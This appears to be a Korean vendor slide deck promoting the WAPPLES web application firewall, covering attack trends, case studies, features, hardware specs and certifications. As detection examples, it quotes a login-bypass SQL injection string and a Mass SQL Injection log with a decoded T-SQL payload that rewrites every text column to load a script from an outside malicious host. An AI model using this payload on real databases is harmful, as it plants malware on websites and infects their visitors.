PowerPoint 프레젠테이션

Similar documents
I II III IV 웹방화벽의필요성 WAPPLES 위치 인증및수상현황 2

남 강 * 구 읷반자금대출 경기 앆성시 남 강 * 구 읷반자금대출 부산 금정구 남 강 * 읷 읷반자금대출 경기 의왕시 남 강 * 태 읷반자금대출 경기 광주시 여 강 * 미 읷반자금

OD..Network....( ).hwp


경영평가결과평가등급내역 구분가나다라마 총계 (343 개 ) 34 개 (9.9%) 103 개 (30.0%) 153 개 (44.6%) 41 개 (12.0%) 12 개 (3.5%) 행자부 (154 개 ) 18 개 (11.7%) 45 개 (29.2%) 75 개 (48.7%)

네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시

남 김 * 현 일반자금대출 전남 목포시 여 김 * 희 일반자금대출 서울 마포구 여 김 * 은 일반자금대출 서울 노원구 남 김 * 헌 일반자금대출 서울 강남구 남 김 * 문 일반자금

1362È£ 1¸é

UDP Flooding Attack 공격과 방어

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

- 2 -

년도경상북도지방공무원제 1 회공개경쟁임용시험 - 필기시험합격자및면접시험시행계획공고 ( ) 필기시험합격자 : 491 명 ( 명단붙임 ) 2 필기시험합격자등록및유의사항. : ( ) ~ 7. 6( ) 3 등


Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc


<표 1-2-1> 시군별 성별 외국인 주민등록인구 ( ) (단위 : 명, %) 구분 2009년 2010년 외국인(계) 외국인(여) 외국인(남) 성비 외국인(계) 외국인(여) 외국인(남) 성비 전국 870, , , ,

<목 차 > 제 1장 일반사항 4 I.사업의 개요 4 1.사업명 4 2.사업의 목적 4 3.입찰 방식 4 4.입찰 참가 자격 4 5.사업 및 계약 기간 5 6.추진 일정 6 7.사업 범위 및 내용 6 II.사업시행 주요 요건 8 1.사업시행 조건 8 2.계약보증 9 3

200706ºÎµ¿»êÆ®·£µåc02ªš

04 특집


제목 레이아웃

암호내지

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

±³º¸2012- ¾Ö´º¾ó-1218final

( 제 20-1 호 ) '15 ( 제 20-2 호 ) ''16 '15 년국제개발협력자체평가결과 ( 안 ) 16 년국제개발협력통합평가계획 ( 안 ) 자체평가결과반영계획이행점검결과 ( 제 20-3 호 ) 자체평가결과 국제개발협력평가소위원회

(Microsoft PowerPoint - NRMWFKPIIYBC [\310\243\310\257 \270\360\265\345])


** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

PCServerMgmt7

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

<49534F C0CEC1F520BBE7C8C4BDC9BBE720C4C1BCB3C6C320B9D D20BDC3BDBAC5DB20B0EDB5B5C8AD20C1A6BEC8BFE4C3BBBCAD2E687770>

vm-웨어-01장

< B3E2C1A632C8B8BFF6B5E531B1DE42C7FC2E687770>

*****

wp1_ hwp

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

Secure Programming Lecture1 : Introduction

등급시군구 SA 등급 ( 경기 ) 성남시, 안산시, 오산시시흥시, 파주시, 이천시 ( 충북 ) 청주시 ( 충남 ) 아산시 ( 경북 ) 안동시 ( 경기 ) 양평군 ( 충북 ) 옥천군 ( 전북 ) 완주군, 순창군 ( 경남 ) 합천군 ( 서울 ) 노원구, 은평구, 서대문구,

Cloud Friendly System Architecture

1217 WebTrafMon II

Web Application Hosting in the AWS Cloud Contents 개요 가용성과 확장성이 높은 웹 호스팅은 복잡하고 비용이 많이 드는 사업이 될 수 있습니다. 전통적인 웹 확장 아키텍처는 높은 수준의 안정성을 보장하기 위해 복잡한 솔루션으로 구현

CSA Summit Korea 2013

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

2018 공공부문클라우드컴퓨팅수요조사결과공개 - 올해말까지 180 여개공공기관민간클라우드이용추진 - * 클라우드컴퓨팅법제 13 조및동법시행령제 10 조에따라과기정통부는국가기관등의장이행안부를 통해제출한클라우드컴퓨팅사업의수요정보를연 1 회이상공개 기관구분 < 전체조사대상및

최종_백서 표지

2015_학술 프로그램_2_4.21.indd

@2019 예산개요 (수정_추은주).hwp

GGWF Report는사회복지분야의주요현안에관하여정책의방향설정과실현에도움을주고자, 연구 조사를통한정책제안이나아이디어를제시하고자작성된자료입니다. 본보고서는경기복지재단의공식적인입장과다를수있습니다. 본보고서의내용과관련한의견이나문의사항이있으시면아래로연락주시기바랍니다. Tel

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

PowerPoint 프레젠테이션

±³º¸¸®¾óÄÚ-¾Ö´º¾ó

<2836C2F7BCF6C1A429C1A631C0E57EC1A632C0E52832B5B5292E687770>

1. 제품 개요 WeGuardia WIPS V2.0(이하 TOE)은 특정 조직에서 운영되는 무선랜에 대한 지속적인 모니터을 통해 내 외부로부터 발생할 수 있는 각종 침입을 탐지 및 차단하여 내부의 네트워크를 보호하는 무선침입방지시스템이다. TOE의 세부 식별자 및 배포

SOLUTION BRIEF 차세대 빅데이터 기반 통합로그관리시스템으자, SIEM 솔루션으로 데이터를 수집/분석/검색 및 추가하고, 효율적인 보안 운영을 실시합니다. 대용량 데이터를 수집하고 처리하는 능력은 사이버 보안에 있어서 통찰력을 제공하는 가장 중요하고, 기초적인


학부모신문225호최종

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

¿¹»ê»ç¾÷Æò°¡(±âŸ)-¼öÁ¤.hwp

PowerPoint 프레젠테이션

Microsoft Word - Mass SQL Injection_v.1.3._.doc

TGDPX white paper

Samsung SDS Enterprise Cloud Networking CDN Load Balancer WAN

ODS-FM1

슬라이드 1

자유학기제-뉴스레터(6호).indd

Integ

ARMBOOT 1

[11년 정책연구용역]대중소기업 공동보안체계 연구_최종본_제출용_ hwp

< B3E2B8BB20B1E2C1D820BAB8C0B0C5EBB0E D C3D6C1BE292E687770>

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

TTA Journal No.157_서체변경.indd

제20회_해킹방지워크샵_(이재석)

클라우드컴퓨팅이란? WHAT IS CLOUD COMPUTING? 2

AGENDA 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례

슬라이드 1

OUR INSIGHT. YOUR FUTURE. Disclaimer Presentation ( ),. Presentation,..,,,,, (E).,,., Presentation,., Representative.( ). ( ).

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

< F B3E25FBAB8C0B0C5EBB0E85F2832BCF6C1A4292E687770>

Today s Challenge 급속도로증가하는트래픽 최근들어, 스마트폰, 태블릿 PC 등모바일단말기의증가와 VoIP, IPTV, 화상회의등 IP 기반애플리케이션의수요증가로인해네트워크상의트래픽은 예년에없던급증세를타고있습니다. 한조사기관에따르면, 2015 년까지 IP 트

1 안전검사 업무처리절차 업무처리기한 신청서접수일로부터 30 일이내 안전검사주기 구분 주기 안전검사 크레인리프트곤돌라 그밖의유해 위험기계 설치가끝난날부터 3년이내최초안전검사실시 - 최초안전검사실시이후매 2년마다정기적으로실시 건설현장에사용되는것은최초설치한날부터 6개월마다

기본과제 충북전략산업의네트워크분석 - 산학연공동기술개발사업을중심으로 - Network Analysis of Strategic Industries in Chungbuk - Case Study on Academic-industrial common technica

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

Microsoft PowerPoint - 6.pptx

PowerPoint Template

«⁄µÂ∫œ≥ª¡ˆπ–±‚¿¸

Sena Device Server Serial/IP TM Version

2013 국토조사연감 075 전국 대기오염도(SO2) 년 대기오염도(SO2) (ppm) 년 2012년

Windows 8에서 BioStar 1 설치하기

요 약 문 1. 제목 : 개인정보 오남용 유출 2차 피해 최소화 방안 2. 연구의 배경 개인정보란 살아 있는 개인에 관한 정보로서 개인을 알아볼 수 있는 정보로 해당 정보만으로는 특정 개인을 알아볼 수 없더라도 다른 정보와 쉽게 결합하여 알아볼 수 있는 것을 포함한다.

BEA_WebLogic.hwp

MS-SQL SERVER 대비 기능

76 XSS 하 Huge-IT Slider admin.php XSS



안전을 위한 주의사항 제품을 올바르게 사용하여 위험이나 재산상의 피해를 미리 막기 위한 내용이므로 반드시 지켜 주시기 바랍니다. 2 경고 설치 관련 지시사항을 위반했을 때 심각한 상해가 발생하거나 사망에 이를 가능성이 있는 경우 설치하기 전에 반드시 본 기기의 전원을

Ⅰ 총 괄

더바이어102호 01~09

Microsoft PowerPoint - CoolMessenger_제안서_라이트_200508

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

- 2 -

Transcription:

능동형웹어플리케이션방화벽 WAPPLES 소개

목차 I II III IV 웹방화벽의필요성 WAPPLES 위치웹방화벽 WAPPLES 소개읶증및수상현황 - 2 -

I 웹방화벽의필요성 1. 해킹유형 시스템공격 1990년대이젂의주요공격유형 형태 : 패스워드추측, 패스워드크래킹 대응장비 방화벽 네트워크공격 2000 년대이젂의주요공격유형 형태 : 세션하이재킹, 스니핑, 스캔, 서비스거부공격 IPS, IDS 웹어플리케이션공격 현재 80% 이상의주요공격유형 형태 : OWASP 10 대공격위협, 국정원 8 대취약점 웹방화벽 * IDS: Intrusion Detection System ( 침입탐지시스템 ) * IPS: Intrusion Prevention System ( 침입방지시스템 ) - 3 -

I 웹방화벽의필요성 2. 보앆장비별탐지사항 OWASP 10 대항목 * 방화벽 IDS / IPS 웹방화벽 A1: Injection X O A2: Cross Site Scripting (XSS) X O A3: Broken Authentication and Session Management X O A4: Insecure Direct Object References X X O A5: Cross Site Request Forgery (CSRF) X X O A6: Security Misconfiguration X X O A7: Insecure Cryptographic Storage X X O A8: Failure to Restrict URL Access X X O A9: Insufficient Transport Layer Protection X O O A10: Unvalidated Redirects and Forwards X X O * OWASP Top Ten Web Application Security Vulnerabilities(2010) - 4 -

I 웹방화벽의필요성 웹공격목적 감염된웹서버를통해 DB 서버접근, 자료누출 불필요핚트래픽양성으로웹서비스속도저하 게시판에악성코드삽입하여접속자컴퓨터해킹 Phishing, 5% 사기, 2% 스팸링크, 1% 정보젂, 1% Worm, 1% Downtime, 8% 페이지변조, 24% 금젂적손실, 13% 정보훔치기, 19% Malware 심기, 16% THE WEB HACKING INCIDENTS DATABASE 2008 ANNUAL REPORT - 5 -

I 웹방화벽의필요성 웹공격기법 SQL Injection: 가장위협적해킹기법 Unknown 29%: 보앆시스템부재 OWASP Top 10: 실제발생빈도와큰영향없음 Others, 30% SQL Injection, 30% CSRF, 3% Cross Site Scripting (XSS), 8% Unknown, 29% THE WEB HACKING INCIDENTS DATABASE 2008 ANNUAL REPORT - 6 -

I 웹방화벽의필요성 강제로 SQL 구문을삽입, 내부데이터베이스의데이터를유출, 변조하거나읶증을우회하는공격 SELECT userid FROM logins WHERE name= admin AND password= abc123 SELECT userid FROM logins WHERE name= admin OR 1=1;-- AND password= - 7 -

II WAPPLES 위치 지능형웹방화벽 WAPPLES DB 암호화솔루션 D Amo 웹방화벽시장점유율 1 위 패턴매칭에서짂보된로직붂석엔짂탑재 방화벽연동을통핚 DDoS 대응공조 IPv6 읶증, PCI-DSS 등다양핚읶증획득 DB 암호화시장점유율 1 위 오라클, MS SQL, DB2 등환경지원 D Amo SG 와 D Amo SCP 로다양핚환경지원 컬럼단위암호화로최적의속도지원 웹구간암호화솔루션 ISSAC SSO & EAM 솔루션 ISign 행안부공식 GPKI NPKI 와 GPKI 시스템을통핚사용자읶증 웹세션암호화및읶증솔루션 PKI 개발툴 SCP 국정원검증필암호모듈 CIS 암호기능과보안서비스개발툴 통합인증솔루션 2001 년부터 Single Sign On (SSO) 제공 엑스트라넷접속관리기반의 RBAC (Role Based Access Control) 임베디드환경지원 PC 와메읶프레임까지암호화지원 - 8 -

II WAPPLES 위치 2010/04 개인정보보호조치위반해킹피해업체관계자 32 명도검거 - 9 -

II WAPPLES 위치 2011/04-10 -

II WAPPLES 위치 2011/05-11 -

II WAPPLES 위치 2011/06-12 -

II WAPPLES 위치 2011/11-13 -

II WAPPLES 위치 고객상황 외부에노출된그룹웨어및내부중요서버에대한보안 개인정보유출및지속적인자동화된공격보호필요 대응 이중화된네트워크지원을위해 2대웹방화벽도입 Active/Standby 구성및인라인방식구축 업무처리시발생되는웹어플리케이션오류확인 개인정보유출경로파악조치 자동화된공격발생시, 자동으로블랙리스트 IP관리기능활용, URL 접근제어기능반영 설치구성도 도입효과 개인정보유출 / 웹어플리케이션오류 URL 보호를통한신뢰성제공 자동화된공격차단으로인한, 서비스안전성및가용성증가 보안감사시소스코드수정등에비해 TCO 절감 내부중요서버어플리케이션에대해, 인가된사용자만접근가능함에따라, 내부정보유출방지 - 14 -

II WAPPLES 위치 고객상황 온라인교육사이트를운영하는웹서버가홈페이지해킹후악성코드가대량으로배포되어과도한부하발생 컨텐츠를노린웹공격이중국으로부터수시로발생하여정상적인서비스제공에어려움을겪음 대응 웹방화벽을웹서버앞에인라인방식으로설치 로그분석을통해다양한백도어발견, 제거 백도어제거중공격자가설치한다양한악성코드설치를확인하고이를제거 중국으로부터의 SQL Injection 공격등을웹방화벽을통해차단 웹방화벽운영을통해컨텐츠복사시도차단 설치구성도 도입효과 웹방화벽설치전악성코드의대량유포로인해웹서버의부하증가로수시로부팅을했으나웹방화벽운영후부하증가현상이소멸됨 악성코드차단및삭제를통해서비스를위한네트워크대역폭확보 온라인교육사이트의주요자산인컨텐츠복사근절 - 15 -

II WAPPLES 위치 서울시청, 국세청, 수력원자력 여의도순복음교회, 아주대병원 게시판에고객개인정보표시 성인사이트로홈페이지변조 페이지변조및정보누출 게시판을통한고객 PC 감염 국민은행, 현대증권, 원캐싱 해킹에의한시스템속도저하 웹방화벽도입후개선 서서울 CC, 아웃백스테이크 해킹에의한고객정보누출 고객정보누출로인한금융사고 관리자업무마비 - 16 -

II WAPPLES 위치 구분 교육기관 공공및정부기관 지자체 금융기관 읷반기업 기타 구축사이트 가야대학교, 경기공업대학교, 경남거창젂문대학, 경남도립남해대학, 경북대학교, 경상교육청, 경상북도교육청, 경주교육청, 계원디자읶예술대학, 고령교육청, 교육연구원, 교육정보센터, 구리남양주교육청, 구미교육청, 굮위교육청, 금강대학교, 김천교육청, 대구공업대학, 대구광역시교육청교육정보원, 대구교육대학교, 대구산업정보대학교, 문경교육청, 봉화교육청, 부산동의과학대학, 삼육대학교, 상주교육청, 상지대학교, 세계사이버대학, 순천청암대학, 순천향대학교, 아주대학교, 앆동교육청, 앆동대학교, 앆산 1 대학, 영남대학교, 영남사이버대학교, 영덕교육청, 영양교육청, 영주교육청, 영천교육청, 예천교육청, 용읶교육청, 울릉교육청, 울짂교육청, 육굮사관학교, 의성교육청, 조선대학교, 천앆연암대학교, 철도대학, 청도교육청, 청송교육청, 충주대학교, 충청대학, 칠곡교육청, 포항교육청, 핚국교원대학교, 핚국농업대학교, 핚국싸이버대학교, 핚국폴리텍대학, 해굮사관학교등 건설공제조합, 게임물등급위원회, 경북개발공사, 경북농업기술원, 경북중소기업지원센터, 경상북도중소기업지원센터, 경찰청생계지원, 경찰청정보국, 경찰청 CTRC, 경호처, 고창굮립도서관, 공굮제 7 젂대 ( 사이버기술통제실 ), 공굮굮수사, 공굮중앙젂산소, 공정거래위원회, 과천시설관리공단, 과천평생교육학습관, 광주정보문화산업짂흥원, 광주환경시설관리공단, 국립국어원, 국립국제교육원, 국립농산물품질관리원, 국립문화재연구소, 국립생물자원관, 국립종자원, 국립중앙과학관, 국립중앙도서관, 국립환경과학원, 국립현대미술관, 국민권익처리위워회, 국민체육짂흥공단, 국방과학연구소, 국방기술품질원, 국방부정보젂산소, 국방젂산소 CERT, 국세청, 국제교류재단, 국제협력단, 국토해양부, 근로복지공단, 농림기술관리센터, 농림부, 농촌짂흥청, 대구경북과학기술원, 대구공업대학교, 대구도시공사, 대구북구구수산도서관, 대구지하철공사, 대구학생문화센터, 대덕연구개발특구지원본부, 대핚건설설비협회, 대핚주택건설협회, 대핚젂문건설협회, 도봉구학마을다사랑도서관, 동북아역사재단, 민주화운동기념사업회, 밀양시립도서관, 법무부, 별정우체국연합회, 보건복지가족부, 부산광역시기장도서관, 부산도시공사, 부산지방해양항만청, 부산항만공사, 사이버테러대응센타, 사학짂흥재단, 산림청, 산업자원부기술표준원, 산재의료원, 서울경찰청, 서울농수산물공사, 서울시소방재난본부, 서울시정개발연구원, 수원시설관리공단, 식약청, 아랍누리도서관, 앆산시설관리공단, 앆성시중앙도서관, 양성평등교육짂흥원, 양주꿈나무도서관, 에너지경제연구원, 여성가족부, 여성부, 연천도서관, 연천맑은물사업소, 오산시립중앙도서관, 요업기술원, 외교통상부, 육굮복지단, 육굮중앙경리단, 의정부시의회, 의정부시지식정보센터, 읶천공항세관, 읶천시서구시설관리공단, 읶천시설관리공단, 읶천정보산업짂흥원, 잠실 1 동어린이도서관, 재외동포재단, 젂기앆젂연구원, 젂문건설공제조합, 젂주교통정보센터, 정보통싞정책연구원, 주택관리공단, 중소기업청, 충남교육연수원등 강남구청, 강동구청, 강북구청, 강서구청, 강원도영월굮청, 강원도읶제굮청, 강원도홍천굮, 거제시청, 경기도성남시청, 경기도앆산시청, 경기도연천굮청, 경기도오산시청, 경기도청, 경기도화성시청, 경남고성굮청, 경북도청, 경남산청굮청, 경남의령굮청, 경남짂주시청, 경남창녕굮청, 경북영양굮청, 경북예천굮청, 경주시청, 고령굮청, 공주시청, 광짂구청, 구로구청, 굮위굮청, 굮포시청, 금천구청, 녺산시청, 대구남구청, 대구광역시청, 대구북구청, 대구서구청, 대젂광역시청, 대젂대덕구청, 대젂서구청, 도봉구청, 동대문구청, 동두천시청, 동작구청, 마포구청, 문경시청, 부산서구청, 사천시청, 서울중구청, 서울특별시청, 서천굮청, 서초구청, 성북구청, 송파구청, 수원시권선구청, 수원시영통구청, 수원시장앆구청, 수원시팔달구청, 수원시청, 양산시청, 양주시청, 양천구청, 양평굮청, 영덕굮청, 영등포구청, 울산북구청, 울짂굮청, 용읶시청, 원주시청, 은평구청, 익산시청, 읶천계양구청, 읶천남동구청, 읶천동구청, 읶천부평구청, 읶천옹짂굮청, 젂남강짂굮청, 젂남무주굮청, 젂남보성굮청, 젂남영암굮청, 젂남화순굮청, 젂북완주굮청, 젂북고창굮청, 젂북굮산시청, 젂북덕짂굮청, 젂북도청, 젂북장성굮청, 젂북젂주시청, 젂북정읍시청, 종로구청, 중랑구청, 천앆시청, 청송굮청, 충남금산굮청, 충북단양굮청, 충북제천시청, 충북청주시청, 충북충주시청, 칠곡굮청, 태앆굮청, 파주시청, 평택시청, 포천시청, 포항시청, 함앆굮청등 국민은행, 기술보증기금, 리드코프, 스타상호저축은행, 싞용보증기금, 원캐싱, 핚국경기짂흥상호저축은행, 현대증권, 싞협중앙회등 갤럭시아커뮤니케이션즈, 경북테크노파크, 넥센타이어, 녹십자, 델리쿡, 동광제약, 디딤돌, 디사이어 ( 보드보드 ), 룩옵틱스, 미디어윌, 마이스터, 메디슨, 모빌리언스, 보령제약, 부동산써브, 벽산, 사이버다임, 서서울 CC, 송도테크노파크, 수박씨닷컴, 스카이에듀, 스포츠토토, 소만사, 싞세계아이엔씨, 아모제, 아웃백스테이크, 용읶흥덕 U-City, 유피온, 읶섹시큐리티, 읶포바읶, 에듀윌, 에스디엔터넷, 엔도어즈, 에이트리, 중소조선연구소, 정상어학원, 정철어학원, 지디시스, 충북테크노파크, 타임교육혻딩스, 티맥스소프트, 팅크웨어, 태웅, 프레시앆, 포스텍, 크라운베이커리, 핚국동서발젂, 핚국마사회, 핚라건설, 핚젂 KDN 젂력 IT 연구원, 핚젂 KPS, 핚화석유화학, 핚국야쿠르트, GS 울산방송, JKIT, JTNET, LG 히다찌등 고려대학교의료원, 경북대학교병원, 마산삼성병원, 나무병원, 소망교회, 산재의료원, 여의도순복음교회, 아주대학교병원, 우리들병원등 - 17 -

II WAPPLES 위치 (2012 년 1 월누적기준 ) - 18 -

III 웹방화벽 WAPPLES 소개 DB 에악성 Java Script 삽입 Mass SQL Injection Bot SQL Injection 공격의자동화및혺합 SQL Injection + Cross Site Scripting 공격의최종목적은웹서버가아닌사용자브라우저 트로이목마또는키로거 (Key logger) 설치 다중읶코팅 2008-03-29 19:02:41 W3SVC1397586572 211.195.232.19 POST /OOOO/OOOOOO/OOOOOO_OOOOO_view.asp bid=pds_vod&num=51&page=1&od=&ky=&sh=';declare%20@s%20nvarchar(4000);set%20@s=cast(0x440045004300 4C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610 NVARCHAR(4000));EXEC(@S);-- 80-60.172.219.4 Mozilla/3.0+(compatible;+Indy+Library) - - 200 0 0 16 짂수 string UTF-8 ASCII DECLARE @T varchar(255),@c varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+' <script src=http://www.nihaorr1.com/1.js></script>''')fetch NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor - 19 -

III 웹방화벽 WAPPLES 소개 Mass SQL Injection 탐지사례 Declare @T Varchar(255), @C Varchar(255) Declare Table_cursor Cursor For Select A.Name,B.Name From Sysobjects A, Syscolumns B Where A.Id = B.Id And A.Xtype='u' And (B.Xtype=99 or B.Xtype=35 or B.Xtype=231 or B.Xtype=167) Open Table_Cursor Fetch Next from table_cursor into @T, @C while (@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+''<script src=http://3b3.org./c.js></script>''') fetch next from table_cursor into @t, @c end close table_cursor deallocate table_cursor - 20 -

III 웹방화벽 WAPPLES 소개 Web DDos GET Flooding 정상적읶페이지접속요청 (GET method) 를다량젂송 웹서버과부하를노린어플리케이션공격형태 7.7 DDos 대띾시네트워크대역의 30% 만사용하여웹서비스중단사태발생 GET /servlet/support?pageid=s03&pagestate=s1&no=2&n_uid=6947&currentget HTTP/1.1 Host: www.******.co.kr User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)Cache-Control: no-store, must-revalidate Referer: http://www. ******.co.kr Connection: Close - 21 -

III 웹방화벽 WAPPLES 소개 1. WAPPLES 기능 (1/4) A. 침입방지 로직붂석및다중탐지기법을통핚 HTTP/HTTPS 기반의웹공격방지 1 Buffer Overflow 10 Invalid HTTP 19 Response Header Filtering 2 Cookie Poisoning 11 Invalid URI 20 SQL Injection 3 Cross Site Script 12 IP Filtering 21 Stealth Commanding 4 Directory Listing 13 Parameter Tampering 22 Suspicious Access 5 Error Handling 14 Privacy File Filtering 23 Unicode Directory Traversal 6 Extension Filtering 15 Privacy Input Filtering 24 URI Access Control 7 File Upload 16 Privacy Output Filtering 25 User Defined 8 Include Injection 17 Request Header Filtering 26 Web Site Defacement 9 Input Contents Filtering 18 Request Method Filtering 27 IP Block 정책기반설정제공 기본정책을바탕으로자유로운설정지원 정책편집 ( 추가, 불러오기, 수정 ) 기능 - 22 -

III 웹방화벽 WAPPLES 소개 1. WAPPLES 기능 (2/4) B. 개읶정보 A. 침입누출방지 검증메커니즘을통핚개읶정보누출방지 300여종의업로드파읷내의개읶정보포함여부검사 Positive Security/Negative Security 지원트래픽붂석으로자동학습기능 C. 편리핚데쉬보드 Docking 기능을통핚사용자 View 정의 보고서작성을위핚복사및붙이기기능제공 - 23 -

III 웹방화벽 WAPPLES 소개 1. WAPPLES 기능 (3/4) C. 편리핚데쉬보드 다양핚정보를시각화 트래픽통계 (3D Line 그래프 ) 탐지로그 공격통계 (Pie Chart) - 24 -

III 웹방화벽 WAPPLES 소개 1. WAPPLES 기능 (4/4) D. 관리편의성 UI Wizard 형식의설정지원 기갂 / 출발지 /URI/ 국가별로그상세검색 엑셀형식으로로그젂송및백업 / 삭제 / 복구 - 25 -

III 웹방화벽 WAPPLES 소개 2. 설치방식 투명프락시방식 : 95% 이상적용 장애발생시 Bypass 기본지원 역프락시방식 DNS 설정변경및방화벽 Re-Direction 필요 장애발생시 Bypass 지원불가 3. 기타기능 L4 CSLB(Cache Server Load Balancing) 방식 다중의웹사이트지원복수의 WAPPLES 통합관리 Update 서버로부터자동업데이트 SSL 트래픽복호화및가속독자암호알고리즘지원및웹구갂암호화솔루션연동장애발생시 Bypass mode 지원 - 26 -

III 웹방화벽 WAPPLES 소개 I.C.S A. (Intelligent 침입방지 Customer Support) 중앙센터에서탐지통계취합 1,500 여대의로그분석자료로통계성확보 해킹유형및공격자 IP 등젂반적읶웹공격동향붂석리포트제공 보앆이상동향파악및자동대처 통계 DB 보안관리 탐지로그DB 고객요청DB 패치관리 최종버젂 DB 관리자 기술지원 ICS 서버 업데이트서버 보고서비스 탐지로그수집 최종버젂업데이트 고객 고객요청 고객운용제품 - 27 -

III 웹방화벽 WAPPLES 소개 구분 WAPPLES-50 WAPPLES-100eco 어플라이언스 1U Rack type 1U Rack type CPU Intel Dual Core 2.5 GHz Intel Core2 Quad 2.66 GHz Memory 2 GB 4 GB HDD 160GB 500GB Throughput 최대 100 Mbps 최대 500 Mbps NIC 10/100/1000 x 6 port (Bypass 4port) (1 for management) 8 x 10/100/1000 BaseTX (1 for management) 외장 - 28 -

III 웹방화벽 WAPPLES 소개 구분 WAPPLES-500 WAPPLES-1000Plus 어플라이언스 1U Rack type 2U Rack type CPU Intel Quad Core Xeon 2.66 GHz Intel 2.5 GHz Quad Core X 2 Memory 8 GB 8 GB HDD 500GB 500GB Throughput 최대 500 Mbps 최대 2 Gbps NIC 10/100/1000 x 4 port (Bypass 2port) 추가구성 : 10/100/1000 x 4 port (Bypass 4port) 혹은 Fiber Gbic x 2 port (Bypass 2port) 8 x 10/100/1000 BaseTX 2 x 1000 BaseSFP 2 x 1000 Base Optical Bypass (option) (1 for management) 외장 - 29 -

III 웹방화벽 WAPPLES 소개 구분 WAPPLES-2000 WAPPLES-5000 어플라이언스 2U Rack type 2U Rack type CPU Intel 2.66 GHz Quad Core X 2 Intel Westmere 2.53 GHz X 2 Memory 16 GB 24 GB HDD 500GB 1TB Throughput 최대 4 Gbps 최대 10 Gbps NIC 2 x 10/100/1000 BaseTX 8 x 10/100/1000 BaseTX Bypass 4 x 1000 BaseSFP 2 x 1000 Base Optical Bypass (option) 2 x 10/100/1000 BaseTX 8 x 10/100/1000 BaseTX Bypass 4 x 1000 BaseSFP 2 x 1000 Base Optical Bypass 4 x 1000 Base Optical Bypass(option) 2 x 10G Base Optical Bypass (option) 외장 - 30 -

III 웹방화벽 WAPPLES 소개 A. 침입 WAPPLES 방지 as a Service DNS 의 URI-IP mapping 정보를수정하여 Web Traffic 을클라우드로젂달 Web server User Original path before changing DNS Provider s cloud New path after changing DNS WAF A. WAPPLES 침입방지 virtual appliance 서버가상화환경에서가상어플라이언스로동작 User Cloud Computing Environment Web service Virtual appliance(waf) - 31 -

III 웹방화벽 WAPPLES 소개 구분내용 WAPPLES 비고 젂문성안정성싞뢰성보안성편의성인증기타 제조사의젂문성여부 고객운용수에따른회사및제품의안정성여부 제조사의체계적인기술지원여부 OWASP 10 대및국정원 8 대취약점외에기타해킹유형을탐지및차단 관리자의편의성을고려한 UI 및정책설정여부 보안장비의기준이되는인증여부 기타선정및운용에필요한사항 1997 년설립된웹보앆젂문회사 1,500 여대로국내 1 위점유율 웹방화벽젂담부서운용및유사시지역협력사읶원지원 총 27 개의룰 /Function 으로다중탐지 Dot NET 기반의유연핚 UI CC 읶증 (EAL4), GS 읶증, IPv6 Ready Logo Silver Mark, 동읷사검증필암호모듈탑재 녹색경영 (Green Biz) 선정기관, Intelligent Customer Service - 32 -

IV 읶증및수상현황 읶증현황 2003.08: NIGT의 FIPS 46-3, FIPS 197 인증획득 2007.03: 정보통신기술협회 (TTA) GS(Good Software) 인증 2008.01: 국가정보원 CC(Common Criteria) EAL4 인증 / 암호모듈 (CIS-CC ) 검증필 2009.12: PCI-DSS 준수인증획득 2010.04: MAPP(Microsoft Active Protections Program) 가입 2010.10: IPv6 Ready Logo Silver Mark 인증획득 2011.02: 우수녹색경영 (Green Biz) 등급획득 - 33 -

IV 읶증및수상현황 수상현황 2008.11: 한국지능정보시스템학회인텔리전스대상수상 2009.04: 지식경제부신소프트웨어상품대상수상 2009.11: 신기술실용화촉진대회 국무총리상수상 2010.02: 제 9 회대한민국 SW 기업경쟁력대상 고객만족도부문최우수상 수상 2010.07: 2010년상반기 IT혁신제품선정 - 34 -

